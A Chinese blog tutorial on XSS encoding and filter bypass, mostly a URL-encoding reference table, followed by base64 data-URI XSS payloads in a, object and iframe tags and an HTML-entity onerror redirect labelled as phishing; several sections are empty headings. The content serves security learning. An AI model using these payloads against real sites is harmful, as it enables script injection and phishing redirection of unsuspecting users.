热门标签
热门文章
- 1mtcnn人脸检测_人脸检测之MTCNN 你想知道的都在这儿!
- 2【Android】碎片的初识
- 3Docker搭建Yearning服务器_docker yearning
- 4动态规划Dynamic Programing_动态规划dynamic programing表
- 5中兴电视盒子中兴B860AV3.2-M刷Armbian新手级教程_zxv10 b860av3.2-m
- 6sa-token快速上手_satoken
- 7高效Redis Client多线程操作的并发吞吐设计
- 8配置WebLogic Server 11g 集群、Session复制(Windows)_如何快速复制weblogic域
- 9怎样选择多线程多进程和多协程?_要执行一批任务时,怎么确定是使用多进程还是多线程还是多协程
- 10生命在于学习——框架-中间件的学习(二)_cxsdk:kdsxc
当前位置: article > 正文
【渗透测试】XSS编码及绕过原理_xss 防御之 url 编码
作者:天景科技苑 | 2024-08-03 05:25:59
赞
踩
xss 防御之 url 编码
一、URL编码
url编码:一个百分号和该字符的ASCII编码所对应的2位十六进制数字。
例如:"/"的url编码位%2F
URL 防止sql注入
URL编码平时是用不到的,因为IE会自动将输入到地址栏的非数字字母转换为url编码。曾有人提出数据库名字里带上“#”以防止被下载,因为IE遇到#就会忽略后面的字母。破解方法很简单——用url编码%23替换掉#。现在SQL注射非常流行,所以就有人写了一些防注射的脚本。
URL 编码对照表
URL 编码形式表示的 ASCII 字符(十六进制格式)。
十六进制格式用于在浏览器和插件中显示非标准的字母和字符。
URL 编码 - 从 %00 到 %8f
| ASCII Value | URL-encode | ASCII Value | URL-encode | ASCII Value | URL-encode |
|---|---|---|---|---|---|
| æ | %00 | 0 | %30 | ` | %60 |
| %01 | 1 | %31 | a | %61 | |
| %02 | 2 | %32 | b | %62 | |
| %03 | 3 | %33 | c | %63 | |
| %04 | 4 | %34 | d | %64 | |
| %05 | 5 | %35 | e | %65 | |
| %06 | 6 | %36 | f | %66 | |
| %07 | 7 | %37 | g | %67 | |
| backspace | %08 | 8 | %38 | h | %68 |
| tab | %09 | 9 | %39 | i | %69 |
| linefeed | %0a | : | %3a | j | %6a |
| %0b | ; | %3b | k | %6b | |
| %0c | < | %3c | l | %6c | |
| c return | %0d | = | %3d | m | %6d |
| %0e | > | %3e | n | %6e | |
| %0f | ? | %3f | o | %6f | |
| %10 | @ | %40 | p | %70 | |
| %11 | A | %41 | q | %71 | |
| %12 | B | %42 | r | %72 | |
| %13 | C | %43 | s | %73 | |
| %14 | D | %44 | t | %74 | |
| %15 | E | %45 | u | %75 | |
| %16 | F | %46 | v | %76 | |
| %17 | G | %47 | w | %77 | |
| %18 | H | %48 | x | %78 | |
| %19 | I | %49 | y | %79 | |
| %1a | J | %4a | z | %7a | |
| %1b | K | %4b | { | %7b | |
| %1c | L | %4c | | | %7c | |
| %1d | M | %4d | } | %7d | |
| %1e | N | %4e | ~ | %7e | |
| %1f | O | %4f | %7f | ||
| space | %20 | P | %50 | € | %80 |
| ! | %21 | Q | %51 | %81 | |
| " | %22 | R | %52 | ‚ | %82 |
| # | %23 | S | %53 | ƒ | %83 |
| $ | %24 | T | %54 | „ | %84 |
| % | %25 | U | %55 | … | %85 |
| & | %26 | V | %56 | † | %86 |
| ’ | %27 | W | %57 | ‡ | %87 |
| ( | %28 | X | %58 | ˆ | %88 |
| ) | %29 | Y | %59 | ‰ | %89 |
| * | %2a | Z | %5a | Š | %8a |
| + | %2b | [ | %5b | ‹ | %8b |
| , | %2c | \ | %5c | Π| %8c |
| - | %2d | ] | %5d | %8d | |
| . | %2e | ^ | %5e | Ž | %8e |
| / | %2f | _ | %5f | %8f |
URL 编码 - 从 %90 到 %ff
| ASCII Value | URL-encode | ASCII Value | URL-encode | ASCII Value | URL-encode |
|---|---|---|---|---|---|
| %90 | À | %c0 | ð | %f0 | |
| ‘ | %91 | Á | %c1 | ñ | %f1 |
| ’ | %92 | Â | %c2 | ò | %f2 |
| “ | %93 | Ã | %c3 | ó | %f3 |
| ” | %94 | Ä | %c4 | ô | %f4 |
| • | %95 | Å | %c5 | õ | %f5 |
| – | %96 | Æ | %c6 | ö | %f6 |
| — | %97 | Ç | %c7 | ÷ | %f7 |
| ˜ | %98 | È | %c8 | ø | %f8 |
| ™ | %99 | É | %c9 | ù | %f9 |
| š | %9a | Ê | %ca | ú | %fa |
| › | %9b | Ë | %cb | û | %fb |
| œ | %9c | Ì | %cc | ü | %fc |
| %9d | Í | %cd | ý | %fd | |
| ž | %9e | Î | %ce | þ | %fe |
| Ÿ | %9f | Ï | %cf | ÿ | %ff |
| %a0 | Ð | %d0 | |||
| ¡ | %a1 | Ñ | %d1 | ||
| ¢ | %a2 | Ò | %d2 | ||
| £ | %a3 | Ó | %d3 | ||
| %a4 | Ô | %d4 | |||
| ¥ | %a5 | Õ | %d5 | ||
| | | %a6 | Ö | %d6 | ||
| § | %a7 | %d7 | |||
| ¨ | %a8 | Ø | %d8 | ||
| © | %a9 | Ù | %d9 | ||
| ª | %aa | Ú | %da | ||
| « | %ab | Û | %db | ||
| ¬ | %ac | Ü | %dc | ||
| ¯ | %ad | Ý | %dd | ||
| ® | %ae | Þ | %de | ||
| ¯ | %af | ß | %df | ||
| ° | %b0 | à | %e0 | ||
| ± | %b1 | á | %e1 | ||
| ² | %b2 | â | %e2 | ||
| ³ | %b3 | ã | %e3 | ||
| ´ | %b4 | ä | %e4 | ||
| µ | %b5 | å | %e5 | ||
| ¶ | %b6 | æ | %e6 | ||
| · | %b7 | ç | %e7 | ||
| ¸ | %b8 | è | %e8 | ||
| ¹ | %b9 | é | %e9 | ||
| º | %ba | ê | %ea | ||
| » | %bb | ë | %eb | ||
| ¼ | %bc | ì | %ec | ||
| ½ | %bd | í | %ed | ||
| ¾ | %be | î | %ee | ||
| ¿ | %bf | ï | %ef |
双url编码:对url编码在进行一次编码 %27 -- > %2527
二、HTML编码
三、javascript编码
四、各个编码利用场景
1、base64编码
Data协议使用方法:data:资源类型;编码,内容
例如:
<a href="可控点">
<iframe src="可控点">
在这种情况下如果过滤了<> ' " javascript的话,那么xss可以这样写,利用base64编码!
将<img src=x onerror=alert(1)>或<script>alert(1)</script> 整条base64编码为 PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==和PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- 1
- 2
- 3
- 4
- 5
<!DOCTYPE html> <html> <head> <title></title> </head> <body> <!--标签一--> <a href="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">click</a> <!--新版浏览器不在支持--> <!--标签二--> <object data="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">click</object> <!-- <script>alert(1)</script> 旧版新版火狐及chrome支持 <img src=x οnerrοr=alert(1)> 旧版新版火狐都不知此后,chrome支持 --> <!--标签三--> <iframe src="data:text/html;base64,PGltZyBzcmM9eCBvbmVycm9yPWFsZXJ0KDEpPg==">click</iframe> <!-- <script>alert(1)</script> 旧版新版火狐及chrome支持 <img src=x οnerrοr=alert(1)> 新版火狐支持,chrome新版支持旧版不支持 --> </body> </html>
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
- 23
- 24
标签解析原理
2、HTML实体编码(十进制和十六进制)
<img src=1 onerror="window.location='https://www.baidu.com'"> <!--钓鱼 跳转页面-->
<img src=1 onerror="window.location='https://www.baidu.com'">
<img src=1 onerror="window.location='https://www.baidu.com'">
- 1
- 2
- 3
- 4
- 5
3、javascript编码
4、URL编码
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/天景科技苑/article/detail/921605
推荐阅读
相关标签
